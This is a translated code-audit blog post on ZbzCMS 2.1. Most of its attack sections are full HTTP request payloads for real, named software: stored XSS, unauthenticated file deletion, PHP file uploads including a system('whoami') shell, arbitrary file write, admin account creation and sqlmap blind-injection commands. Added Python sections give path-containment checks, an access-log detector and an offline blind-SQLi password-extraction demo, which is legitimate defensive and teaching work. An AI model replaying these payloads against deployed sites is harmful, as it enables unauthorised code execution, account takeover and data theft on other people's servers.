安全矩阵

Code Audit of a Certain CMS

Posted on 2022-1-7 18:29:37
Original link: Code Audit of a Certain CMS

0x00 Preface
ZbzCMS 2.1 is riddled with holes; all one can say is that the developer must have been offered up to the heavens, and the magic is boundless.
Tools used: Seay Source Code Audit System, Notepad++ and PhpStudy.
0x01 Stored XSS
A stored XSS was located in:

/cms/common/php/ajax.php
Construct the payload (the guestbook handler run=liuyan stores the neirong field as submitted):
POST /cms/common/php/ajax.php?run=liuyan HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Content-Length: 105
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://x.x.x.x/cms/common/php/ajax.php?run=liuyan
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

diaoyongbiaoqian=hacker&neirong=<script>alert('what the hack')</script>&leixing=1

Viewing it in the backend:

0x02 Front-End Arbitrary File Deletion
A file deletion operation was located.

It performs no authentication check:

The request is trivial to construct, so there is not much to say... it can be combined with the reinstall vulnerability to get a shell.
Construct the payload:
POST /cms/cms/include/up.php?run=del HTTP/1.1
url=../../../ddd.jpg

0x03 Front-End Arbitrary File Upload
Upload point 1
A file upload was located.

Payload (the path parameter is taken verbatim, so ../../../ writes the file outside the upload directory):

POST /cms/cms/include/up.php?run=file&path=../../../&filename=1 HTTP/1.1
Host: xxx
Connection: keep-alive
Content-Length: 211
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryU9A5BBZeovUxg3UP
Origin: http://xxx
Referer: http://xxx/cms/cms/admin/wenjian.php?path=../../..
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

------WebKitFormBoundaryU9A5BBZeovUxg3UP
Content-Disposition: form-data; name="0"; filename="info.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
------WebKitFormBoundaryU9A5BBZeovUxg3UP--



Upload point 2
/cms/cms/zbzedit/php/zbz.php
It defines a pile of parameters and performs no authentication check, which directly allows arbitrary file upload and a shell.

Payload:
POST /cms/cms/zbzedit/php/zbz.php?run=uptxt&path=../../../&path_res=../../&data_pic_name=1 HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Content-Length: 234
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryol3qy7YKEOE2tHFq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://x.x.x.x/cms/cms/zbzedit/php/zbz.php?run=uptxt&path=../../../&path_res=../../&data_pic_name=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

------WebKitFormBoundaryol3qy7YKEOE2tHFq
Content-Disposition: form-data; name="0"; filename="poc.php"
Content-Type: text/plain

<?php system("whoami");?>
------WebKitFormBoundaryol3qy7YKEOE2tHFq--


The upload response returns the stored path. With data_pic_name=0 the file is renamed; with data_pic_name=1 the original filename is kept.

Upload point 3
/cms/cms/admin/ajax.php has the same unauthenticated file upload (though here the renaming cannot be controlled).

Payload:
POST /cms/cms/admin/ajax.php?run=youad_pic HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Content-Length: 196
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMnkzsdthG7uKREBW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://x.x.x.x/cms/cms/admin/ajax.php?run=youad_pic
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

------WebKitFormBoundaryMnkzsdthG7uKREBW
Content-Disposition: form-data; name="1"; filename="ccc.php"
Content-Type: text/plain

<?php phpinfo();?>
------WebKitFormBoundaryMnkzsdthG7uKREBW--




0x04 Front-End Unauthenticated RCE
/cms/cms/admin/run_ajax.php
Lines 461-470 implement the file-edit save operation.

Passing the path and neirong parameters gives arbitrary file write and creation.
Payload (writes /ddd.php into the root directory):
POST /cms/cms/admin/run_ajax.php?run=wenjian_edit HTTP/1.1
path=../../../ddd.php&neirong=<?php phpinfo();?>
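Every handler in 0x02, 0x03 and 0x04 (run=del, run=file, run=uptxt, run=wenjian_edit) fails in the same two ways: no session check, and a caller-supplied path or url joined onto a directory without any containment check. The following is an added example, not ZbzCMS code, showing the two checks those handlers are missing, with the audit's own payloads replayed against them. The CMS is PHP; the checks are written in Python so they can be run as-is. The directory layout, the session dict, the handler names and the extension allow-list are assumptions made for the example.

```python
"""Path-containment and upload-name checks for a file API like the one audited.

Added example, not ZbzCMS code.  Directory layout, the session dict and the
handler names are assumptions made for this example.
"""
import os
import secrets
from typing import Optional

WEB_ROOT = "/var/www/html/cms"                      # assumed install directory
UPLOAD_DIR = os.path.join(WEB_ROOT, "uploads")      # assumed upload directory
TEMPLATE_DIR = os.path.join(WEB_ROOT, "templates")  # assumed editor scope
ALLOWED_UPLOAD_EXT = {"jpg", "jpeg", "png", "gif"}  # assumed allow-list


class Forbidden(Exception):
    """No admin session, or a path/filename that must not be touched."""


def require_admin(session: dict) -> None:
    """The audited handlers check nothing; a server-side session flag must be
    verified before any parameter is even looked at."""
    if not session.get("is_admin"):
        raise Forbidden("admin session required")


def resolve_under(base: str, user_path: str) -> str:
    """Join user_path onto base and return the absolute result, or raise
    Forbidden when, after '..' collapsing, it lies outside base.

    The check is lexical (normpath) so it runs offline; on a live system also
    apply os.path.realpath so a symlink inside base cannot point outside it."""
    if "\0" in user_path:
        raise Forbidden("NUL byte in path")
    if os.path.isabs(user_path):
        raise Forbidden("absolute path not allowed")
    base_abs = os.path.normpath(os.path.abspath(base))
    candidate = os.path.normpath(os.path.join(base_abs, user_path))
    if candidate != base_abs and not candidate.startswith(base_abs + os.sep):
        raise Forbidden(f"{user_path!r} escapes {base}")
    return candidate


def stored_upload_name(client_filename: str) -> str:
    """Allow-list the extension and throw the client's basename away: the
    stored name is random, so info.php / poc.php / ccc.php never land under a
    name the web server will execute, and a 'keep original name' option like
    data_pic_name=1 simply does not exist."""
    name = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not name or "\0" in name or "." not in name:
        raise Forbidden("bad filename")
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_UPLOAD_EXT:
        raise Forbidden(f"extension .{ext} not allowed")
    return f"{secrets.token_hex(16)}.{ext}"


def handle_file_op(session: dict, run: str, params: dict) -> str:
    """Dispatcher modelled on up.php?run=... / run_ajax.php?run=... (hypothetical);
    returns the absolute path the operation would touch."""
    require_admin(session)
    if run == "del":
        return resolve_under(UPLOAD_DIR, params["url"])
    if run in ("file", "uptxt"):              # upload into a chosen subdirectory
        target_dir = resolve_under(UPLOAD_DIR, params.get("path", ""))
        return os.path.join(target_dir, stored_upload_name(params["filename"]))
    if run == "wenjian_edit":                 # file editor limited to templates
        return resolve_under(TEMPLATE_DIR, params["path"])
    raise Forbidden(f"unknown run={run!r}")


def try_file_op(session: dict, run: str, params: dict) -> Optional[str]:
    """Same as handle_file_op but returns None instead of raising."""
    try:
        return handle_file_op(session, run, params)
    except Forbidden:
        return None


if __name__ == "__main__":
    admin = {"is_admin": True}
    # The payloads from 0x02, 0x03 and 0x04 replayed against the hardened checks.
    for run, params in [
        ("del", {"url": "../../../ddd.jpg"}),
        ("file", {"path": "../../../", "filename": "info.php"}),
        ("uptxt", {"path": "../../../", "filename": "poc.php"}),
        ("wenjian_edit", {"path": "../../../ddd.php"}),
    ]:
        print(run, "->", try_file_op(admin, run, params))   # all rejected (None)
    print(try_file_op(admin, "file", {"path": "2022", "filename": "photo.jpg"}))
```

The containment test compares against `base_abs + os.sep`, not just `base_abs`, so a sibling directory such as `uploads_old` is not accepted as being inside `uploads`; the upload path never uses the client's filename at all, which removes the double-extension and renaming games entirely.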

0x05 Front-End Unauthenticated Admin Creation

Here is an operation that adds or edits an administrator:

Payload:
POST /cms/cms/admin/run_ajax.php?run=admin HTTP/1.1
mima=123456&guanliyuan=hack

The new account still cannot log into the backend (its level is too low), so a session is created through the login function instead:

POST /cms/cms/admin/run_ajax.php?run=login HTTP/1.1
guanliyuan=hack&pwd=123456

Refresh the page and you are logged into the backend.
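For anyone running this CMS, the practical takeaway from 0x02 to 0x05 is that the dangerous handlers are identified by a script path plus a run= value in the query string. The following is an added example, not part of the original post, of a detection pass over web-server access logs built from exactly those paths and handler names. The log lines are constructed (Apache combined format), the field list is an assumption, and note the caveat in the code: parameters sent in the POST body, such as url= in the run=del request, are not visible in an access log, so only the handler name can be flagged for those.

```python
"""Access-log detection for the unauthenticated handlers in 0x02 to 0x05.

Added example, not part of the original post.  Script paths and run= names
are taken from the payloads above; the sample log lines are constructed and
the combined-log field layout is an assumption.  Only query-string parameters
are visible in an access log, so a traversal sent in the POST body (the
run=del url=... case) needs a request-body log or WAF to catch; the handler
name alone is still flagged.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Handlers the audit shows reachable without a session, keyed by script path.
SENSITIVE = {
    "/cms/cms/include/up.php": {"del", "file"},
    "/cms/cms/zbzedit/php/zbz.php": {"uptxt"},
    "/cms/cms/admin/ajax.php": {"youad_pic"},
    "/cms/cms/admin/run_ajax.php": {"wenjian_edit", "admin"},
}
PATH_PARAMS = ("path", "path_res", "url", "filename")
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Combined log format: ip ident user [ts] "method target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def classify(line: str):
    """Return a reason string when the request hits a known unauthenticated
    handler (plus any traversal in its query parameters), else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    runs = SENSITIVE.get(parts.path)
    if runs is None:
        return None
    query = parse_qs(parts.query)
    run = query.get("run", [""])[0]
    if run not in runs:
        return None
    reasons = [f"unauth-handler run={run}"]
    for key in PATH_PARAMS:
        for value in query.get(key, []):          # parse_qs already URL-decodes
            if TRAVERSAL.search(value):
                reasons.append(f"traversal in {key}={value}")
    return "; ".join(reasons)


def scan(lines):
    """Return [(1-based line number, reason)] for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        reason = classify(line)
        if reason:
            hits.append((n, reason))
    return hits


# Constructed sample log: two attack requests from the audit, two benign ones.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jan/2022:18:29:37 +0800] "POST /cms/cms/include/up.php?run=file&path=../../../&filename=1 HTTP/1.1" 200 87 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Jan/2022:18:30:02 +0800] "POST /cms/cms/admin/run_ajax.php?run=admin HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.9 - - [07/Jan/2022:18:31:11 +0800] "GET /cms/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [07/Jan/2022:18:31:20 +0800] "GET /cms/cms/include/up.php?run=list HTTP/1.1" 200 410 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for n, reason in scan(SAMPLE_LOG.splitlines()):
        print(f"line {n}: {reason}")
```

Because the audited endpoints are reachable with no session, a single hit from an IP that has never authenticated is already worth an alert; the traversal reasons just raise the severity.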

0x06 Front-End MySQL Blind Injection
Injection point 1: on a second, manual pass over the code, /cms/common/php/ajax.php turned out to have SQL injection.

The id parameter goes straight into the query.

Run sqlmap straight at it:

sqlmap -u "http://xxx/cms/common/php/ajax.php?run=ad&id=3" -p id

Injection point 2: /cms/cms/include/make.php has boolean-based and time-based blind injection.

Run sqlmap straight at it:

sqlmap -u "http://xxx/cms/cms/include/make.php?t=1&php=2&art=2" -p art
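What sqlmap does with the id and art parameters above is worth seeing without a target. The following is an added example, not ZbzCMS code: a constructed SQLite stand-in for the ad table, a query function that concatenates id into the SQL the way an unparameterised PHP query does, the boolean oracle that such a query exposes, a character-by-character extraction driven by that oracle (the boolean-based technique), and the bound-parameter version that closes it. The schema, the rows and the function names are assumptions; SQLite has no SLEEP(), so the time-based variant is not reproduced here.

```python
"""Boolean-based blind SQL injection on an id parameter, reproduced offline.

Added example, not ZbzCMS code.  The schema, rows and query functions are
constructed stand-ins (SQLite instead of MySQL).  The vulnerable function
builds SQL by string concatenation the way an unparameterised PHP query
does; the fixed one binds the value.
"""
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE ad (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO ad VALUES (1, 'banner'), (2, 'sidebar'), (3, 'footer');
        CREATE TABLE admin (id INTEGER PRIMARY KEY, guanliyuan TEXT, mima TEXT);
        INSERT INTO admin VALUES (1, 'admin', 's3cret');
    """)
    return con


def ad_title_vulnerable(con, id_param: str) -> Optional[str]:
    """run=ad&id=... as the audit describes it: id goes into the SQL verbatim."""
    row = con.execute(f"SELECT title FROM ad WHERE id={id_param}").fetchone()
    return row[0] if row else None


def ad_title_fixed(con, id_param: str) -> Optional[str]:
    """Same query with a bound parameter: '3 AND 1=1' is just a non-numeric
    string that matches no id."""
    row = con.execute("SELECT title FROM ad WHERE id=?", (id_param,)).fetchone()
    return row[0] if row else None


def oracle(con, condition: str) -> bool:
    """The boolean oracle: does the page for id=3 still render when the
    injected condition is ANDed on?  True/False leaks one bit per request."""
    return ad_title_vulnerable(con, f"3 AND ({condition})") is not None


def extract_admin_password(con, max_len: int = 32) -> str:
    """Recover admin.mima one character at a time by binary search over the
    printable ASCII range, which is what a boolean-based technique does."""
    secret = "(SELECT mima FROM admin LIMIT 1)"
    recovered = ""
    for pos in range(1, max_len + 1):
        if not oracle(con, f"length({secret})>={pos}"):
            break                          # ran past the end of the value
        lo, hi = 32, 126
        while lo < hi:                     # about 7 requests per character
            mid = (lo + hi) // 2
            if oracle(con, f"unicode(substr({secret},{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    con = make_db()
    print(ad_title_vulnerable(con, "3 AND 1=1"), ad_title_vulnerable(con, "3 AND 1=2"))
    print(extract_admin_password(con))
    print(ad_title_fixed(con, "3 AND 1=1"))
```

The two probes `3 AND 1=1` and `3 AND 1=2` returning different pages is the whole signal sqlmap needs; with that oracle the admin password comes out at roughly seven requests per character, which is why a blind injection on a throwaway ad endpoint is no less serious than one on the login form.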


